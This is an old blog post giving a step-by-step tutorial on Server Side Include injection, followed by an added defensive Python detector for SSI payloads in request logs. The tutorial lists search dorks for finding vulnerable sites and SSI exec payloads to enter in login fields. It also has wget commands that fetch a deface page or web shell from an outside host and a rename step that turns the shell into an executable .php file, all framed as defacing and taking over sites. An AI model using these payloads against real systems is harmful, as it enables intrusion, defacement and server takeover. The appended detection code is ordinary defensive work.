Tuesday 26 June 2012

SSI (Server Side Include) Injection and shell uploading tutorial


Server Side Include (SSI) injection is a web application exploit which gives us access to upload files remotely to vulnerable sites. File uploading works with multiple extensions; the exception is .php, so you cannot execute your shell in .php form.


  • The first step is finding a vulnerable site with Google/Bing dorks:
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

If the dorks don't work, find the sites manually with the following codes:
  • Manual injection: put the following codes in the USERNAME and PASSWORD fields
  1. <!--#echo var="DATE_LOCAL" -->  It will show the date
  2. <!--#exec cmd="whoami"--> It will show the running user on the server
  3. <pre><!--#exec cmd="ls -a" --></pre> Linux only
    It will show the directory files
  4. <!-- #exec cmd="dir" --> Windows only; displays the directory files



  • After finding a vulnerable loophole in the site, it's time to upload your deface page or shell.
  • First find a hosting provider where you can upload your deface page; the best one is pastehtml.com
  • Now enter the following code in the USERNAME and PASSWORD fields
    <!--#exec cmd="wget http://website.com/deface.html" -->
  • This code uploads your deface page. To view it, go to http://website.com/deface.html


How to upload a shell to the site:
  • First host your shell in .txt format on any site.
  • Then enter the following code in the login page:
    <!--#exec cmd="wget http://website.com/shell.txt" -->
  • Check whether your shell.txt was uploaded with this code:
    <pre><!--#exec cmd="ls -a" --></pre>
  • Change the file extension from shell.txt to shell.php with this command:
    <!--#exec cmd="mv abc.txt abc.php" -->
  • Now you can access your shell at this link: site.com/shell.php
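
Every step above depends on the server parsing an `<!--#...-->` directive out of a form field. The following is an added example, not part of the original post: a Python check that flags SSI directives in request parameters, including multiply URL-encoded ones, and HTML-escapes input before it is echoed into a parsed page. The function names, directive list and log lines are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# SSI directive opener as used in this post: "<!--#exec", also "<!-- #exec".
SSI_RE = re.compile(r"<!--\s*#\s*(exec|include|echo|config|printenv|set|fsize|flastmod)\b", re.I)

def decode_layers(value, max_rounds=3):
    """Undo repeated URL-encoding (e.g. %253C -> %3C -> <), bounded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(value):
    """Return the lower-cased SSI directive names found in one input value."""
    return [m.group(1).lower() for m in SSI_RE.finditer(decode_layers(value))]

def neutralize(value):
    """HTML-escape input so '<!--#' reaches the page as inert text."""
    return html.escape(value, quote=True)

def scan_request_line(line):
    """Flag query parameters of an access-log request line carrying SSI."""
    try:
        target = line.split('"')[1].split()[1]   # "GET /path?query HTTP/1.1"
    except IndexError:
        return []
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        found = find_ssi(raw)
        if found:
            hits.append((name, found))
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2012:10:00:01 +0000] "GET /login.shtml?user=alice&pass=x HTTP/1.1" 200 512',
    '192.0.2.44 - - [26/Jun/2012:10:00:09 +0000] "GET /login.shtml?user=%3C!--%23exec%20cmd%3D%22whoami%22--%3E&pass=x HTTP/1.1" 200 540',
    '192.0.2.44 - - [26/Jun/2012:10:00:15 +0000] "GET /search.shtml?q=%253C!--%2520%2523echo%2520var%253D%2522DATE_LOCAL%2522%2520--%253E HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_request_line(entry) or "clean", "|", entry[:60])
```

On Apache, `Options IncludesNOEXEC` additionally disables `#exec` while leaving other includes working.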